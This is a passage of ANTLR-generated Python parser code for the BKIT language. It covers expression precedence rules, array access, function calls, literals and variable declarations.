_parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 34\n self.enterRecursionRule(localctx, 34, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 261\n self.expr3(0)\n self._ctx.stop = self._input.LT(-1)\n self.state = 268\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 263\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 264\n self.match(BKITParser.ADD_OP)\n self.state = 265\n self.expr3(0) \n self.state = 270\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,16,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr3Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr3(self):\n return self.getTypedRuleContext(BKITParser.Expr3Context,0)\n\n\n def MUL_OP(self):\n return self.getToken(BKITParser.MUL_OP, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr3\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr3\" ):\n listener.enterExpr3(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr3\" ):\n listener.exitExpr3(self)\n\n\n\n def expr3(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr3Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 36\n self.enterRecursionRule(localctx, 36, self.RULE_expr3, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 272\n self.expr4()\n self._ctx.stop = self._input.LT(-1)\n self.state = 279\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr3Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr3)\n self.state = 274\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 275\n self.match(BKITParser.MUL_OP)\n self.state = 276\n self.expr4() \n self.state = 281\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,17,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class Expr4Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_LOGICAL_OP(self):\n return self.getToken(BKITParser.UN_LOGICAL_OP, 0)\n\n def expr4(self):\n return self.getTypedRuleContext(BKITParser.Expr4Context,0)\n\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr4\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr4\" ):\n listener.enterExpr4(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr4\" ):\n listener.exitExpr4(self)\n\n\n\n\n def expr4(self):\n\n localctx = BKITParser.Expr4Context(self, self._ctx, self.state)\n self.enterRule(localctx, 38, self.RULE_expr4)\n try:\n self.state = 285\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_LOGICAL_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 282\n self.match(BKITParser.UN_LOGICAL_OP)\n self.state = 283\n self.expr4()\n pass\n elif token in [BKITParser.ID, BKITParser.UN_OP, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 284\n self.expr5()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr5Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def UN_OP(self):\n return self.getToken(BKITParser.UN_OP, 0)\n\n def expr5(self):\n return self.getTypedRuleContext(BKITParser.Expr5Context,0)\n\n\n def expr6(self):\n return self.getTypedRuleContext(BKITParser.Expr6Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr5\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr5\" ):\n listener.enterExpr5(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr5\" ):\n listener.exitExpr5(self)\n\n\n\n\n def expr5(self):\n\n localctx = BKITParser.Expr5Context(self, self._ctx, self.state)\n self.enterRule(localctx, 40, self.RULE_expr5)\n try:\n self.state = 290\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.UN_OP]:\n self.enterOuterAlt(localctx, 1)\n self.state = 287\n self.match(BKITParser.UN_OP)\n self.state = 288\n self.expr5()\n pass\n elif token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_PAREN, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 2)\n self.state = 289\n self.expr6()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr6Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array_cell(self):\n return self.getTypedRuleContext(BKITParser.Array_cellContext,0)\n\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr6\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr6\" ):\n listener.enterExpr6(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr6\" ):\n listener.exitExpr6(self)\n\n\n\n\n def expr6(self):\n\n localctx = BKITParser.Expr6Context(self, self._ctx, self.state)\n self.enterRule(localctx, 42, self.RULE_expr6)\n try:\n self.state = 294\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,20,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 292\n self.array_cell()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 293\n self.expr7()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_cellContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def expr7(self):\n return self.getTypedRuleContext(BKITParser.Expr7Context,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_cell\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterArray_cell\" ):\n listener.enterArray_cell(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitArray_cell\" ):\n listener.exitArray_cell(self)\n\n\n\n\n def array_cell(self):\n\n localctx = BKITParser.Array_cellContext(self, self._ctx, self.state)\n self.enterRule(localctx, 44, self.RULE_array_cell)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 296\n self.expr7()\n self.state = 301 \n self._errHandler.sync(self)\n _alt = 1\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt == 1:\n self.state = 297\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 298\n self.expr()\n self.state = 299\n self.match(BKITParser.RIGHT_BRACKET)\n\n else:\n raise NoViableAltException(self)\n self.state = 303 \n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,21,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr7Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def function_call(self):\n return self.getTypedRuleContext(BKITParser.Function_callContext,0)\n\n\n def expr8(self):\n return self.getTypedRuleContext(BKITParser.Expr8Context,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr7\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr7\" ):\n listener.enterExpr7(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr7\" ):\n listener.exitExpr7(self)\n\n\n\n\n def expr7(self):\n\n localctx = BKITParser.Expr7Context(self, self._ctx, self.state)\n self.enterRule(localctx, 46, self.RULE_expr7)\n try:\n self.state = 307\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,22,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 305\n self.function_call()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 306\n self.expr8()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr8Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr8\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterExpr8\" ):\n listener.enterExpr8(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitExpr8\" ):\n listener.exitExpr8(self)\n\n\n\n\n def expr8(self):\n\n localctx = BKITParser.Expr8Context(self, self._ctx, self.state)\n self.enterRule(localctx, 48, self.RULE_expr8)\n try:\n self.state = 314\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID, BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT, BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 1)\n self.state = 309\n self.operand()\n pass\n elif token in [BKITParser.LEFT_PAREN]:\n self.enterOuterAlt(localctx, 2)\n self.state = 310\n self.match(BKITParser.LEFT_PAREN)\n self.state = 311\n self.expr()\n self.state = 312\n self.match(BKITParser.RIGHT_PAREN)\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterOperand\" ):\n listener.enterOperand(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitOperand\" ):\n listener.exitOperand(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 50, self.RULE_operand)\n try:\n self.state = 319\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.ID]:\n self.enterOuterAlt(localctx, 1)\n self.state = 316\n self.match(BKITParser.ID)\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.enterOuterAlt(localctx, 2)\n self.state = 317\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.enterOuterAlt(localctx, 3)\n self.state = 318\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_callContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_PAREN(self):\n return self.getToken(BKITParser.LEFT_PAREN, 0)\n\n def RIGHT_PAREN(self):\n return self.getToken(BKITParser.RIGHT_PAREN, 0)\n\n def expr(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.ExprContext)\n else:\n return self.getTypedRuleContext(BKITParser.ExprContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_call\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterFunction_call\" ):\n listener.enterFunction_call(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitFunction_call\" ):\n listener.exitFunction_call(self)\n\n\n\n\n def function_call(self):\n\n localctx = BKITParser.Function_callContext(self, self._ctx, self.state)\n self.enterRule(localctx, 52, self.RULE_function_call)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 321\n self.match(BKITParser.ID)\n self.state = 322\n self.match(BKITParser.LEFT_PAREN)\n self.state = 333\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.ID) | (1 << BKITParser.UN_LOGICAL_OP) | (1 << BKITParser.UN_OP) | (1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_PAREN) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 323\n self.expr()\n self.state = 328\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 324\n self.match(BKITParser.COMMA)\n self.state = 325\n self.expr()\n self.state = 330\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 335\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n self.state = 336\n self.match(BKITParser.RIGHT_PAREN)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Index_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACKET(self):\n return self.getToken(BKITParser.LEFT_BRACKET, 0)\n\n def expr(self):\n return self.getTypedRuleContext(BKITParser.ExprContext,0)\n\n\n def RIGHT_BRACKET(self):\n return self.getToken(BKITParser.RIGHT_BRACKET, 0)\n\n def index_op(self):\n return self.getTypedRuleContext(BKITParser.Index_opContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_index_op\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterIndex_op\" ):\n listener.enterIndex_op(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitIndex_op\" ):\n listener.exitIndex_op(self)\n\n\n\n\n def index_op(self):\n\n localctx = BKITParser.Index_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 54, self.RULE_index_op)\n try:\n self.state = 347\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,27,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 338\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 339\n self.expr()\n self.state = 340\n self.match(BKITParser.RIGHT_BRACKET)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 342\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 343\n self.expr()\n self.state = 344\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 345\n self.index_op()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterArray\" ):\n listener.enterArray(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitArray\" ):\n listener.exitArray(self)\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 56, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 349\n self.match(BKITParser.ID)\n self.state = 350\n self.match(BKITParser.ASSIGN)\n self.state = 351\n self.array_lit()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_dataContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT_LIT(self):\n return self.getToken(BKITParser.INT_LIT, 0)\n\n def FLOAT_LIT(self):\n return self.getToken(BKITParser.FLOAT_LIT, 0)\n\n def STRING_LIT(self):\n return self.getToken(BKITParser.STRING_LIT, 0)\n\n def BOOL_LIT(self):\n return self.getToken(BKITParser.BOOL_LIT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_data\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterPrimitive_data\" ):\n listener.enterPrimitive_data(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitPrimitive_data\" ):\n listener.exitPrimitive_data(self)\n\n\n\n\n def primitive_data(self):\n\n localctx = BKITParser.Primitive_dataContext(self, self._ctx, self.state)\n self.enterRule(localctx, 58, self.RULE_primitive_data)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 353\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Array_litContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def LEFT_BRACE(self):\n return self.getToken(BKITParser.LEFT_BRACE, 0)\n\n def RIGHT_BRACE(self):\n return self.getToken(BKITParser.RIGHT_BRACE, 0)\n\n def primitive_data(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Primitive_dataContext)\n else:\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,i)\n\n\n def array_lit(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Array_litContext)\n else:\n return self.getTypedRuleContext(BKITParser.Array_litContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_array_lit\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterArray_lit\" ):\n listener.enterArray_lit(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitArray_lit\" ):\n listener.exitArray_lit(self)\n\n\n\n\n def array_lit(self):\n\n localctx = BKITParser.Array_litContext(self, self._ctx, self.state)\n self.enterRule(localctx, 60, self.RULE_array_lit)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 355\n self.match(BKITParser.LEFT_BRACE)\n self.state = 370\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.INT_LIT) | (1 << BKITParser.FLOAT_LIT) | (1 << BKITParser.BOOL_LIT) | (1 << BKITParser.STRING_LIT) | (1 << BKITParser.LEFT_BRACE))) != 0):\n self.state = 358\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 356\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 357\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 367\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 360\n self.match(BKITParser.COMMA)\n self.state = 363\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 361\n self.primitive_data()\n pass\n elif token in [BKITParser.LEFT_BRACE]:\n self.state = 362\n self.array_lit()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 369\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n\n\n self.state = 372\n self.match(BKITParser.RIGHT_BRACE)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def var_non_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_non_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_non_initContext,i)\n\n\n def var_init(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_initContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_initContext,i)\n\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_list\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_list\" ):\n listener.enterVar_list(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_list\" ):\n listener.exitVar_list(self)\n\n\n\n\n def var_list(self):\n\n localctx = BKITParser.Var_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 62, self.RULE_var_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 376\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,32,self._ctx)\n if la_ == 1:\n self.state = 374\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 375\n self.var_init()\n pass\n\n\n self.state = 385\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 378\n self.match(BKITParser.COMMA)\n self.state = 381\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,33,self._ctx)\n if la_ == 1:\n self.state = 379\n self.var_non_init()\n pass\n\n elif la_ == 2:\n self.state = 380\n self.var_init()\n pass\n\n\n self.state = 387\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ASSIGN(self):\n return self.getToken(BKITParser.ASSIGN, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def array_lit(self):\n return self.getTypedRuleContext(BKITParser.Array_litContext,0)\n\n\n def primitive_data(self):\n return self.getTypedRuleContext(BKITParser.Primitive_dataContext,0)\n\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.RIGHT_BRACKET)\n else:\n return self.getToken(BKITParser.RIGHT_BRACKET, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_init\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterVar_init\" ):\n listener.enterVar_init(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitVar_init\" ):\n listener.exitVar_init(self)\n\n\n\n\n def var_init(self):\n\n localctx = BKITParser.Var_initContext(self, self._ctx, self.state)\n self.enterRule(localctx, 64, self.RULE_var_init)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 397\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,36,self._ctx)\n if la_ == 1:\n self.state = 388\n self.match(BKITParser.ID)\n self.state = 392 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 389\n self.match(BKITParser.LEFT_BRACKET)\n self.state = 390\n self.match(BKITParser.INT_LIT)\n self.state = 391\n self.match(BKITParser.RIGHT_BRACKET)\n self.state = 394 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.LEFT_BRACKET):\n break\n\n pass\n\n elif la_ == 2:\n self.state = 396\n self.match(BKITParser.ID)\n pass\n\n\n self.state = 399\n self.match(BKITParser.ASSIGN)\n self.state = 402\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.LEFT_BRACE]:\n self.state = 400\n self.array_lit()\n pass\n elif token in [BKITParser.INT_LIT, BKITParser.FLOAT_LIT, BKITParser.BOOL_LIT, BKITParser.STRING_LIT]:\n self.state = 401\n self.primitive_data()\n pass\n else:\n raise NoViableAltException(self)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_non_initContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def LEFT_BRACKET(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.LEFT_BRACKET)\n else:\n return self.getToken(BKITParser.LEFT_BRACKET, i)\n\n def INT_LIT(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.INT_LIT)\n else:\n return self.getToken(BKITParser.INT_LIT, i)\n\n def RIGHT_BRACKET(self, i:int=None):\n if i is None:\n return 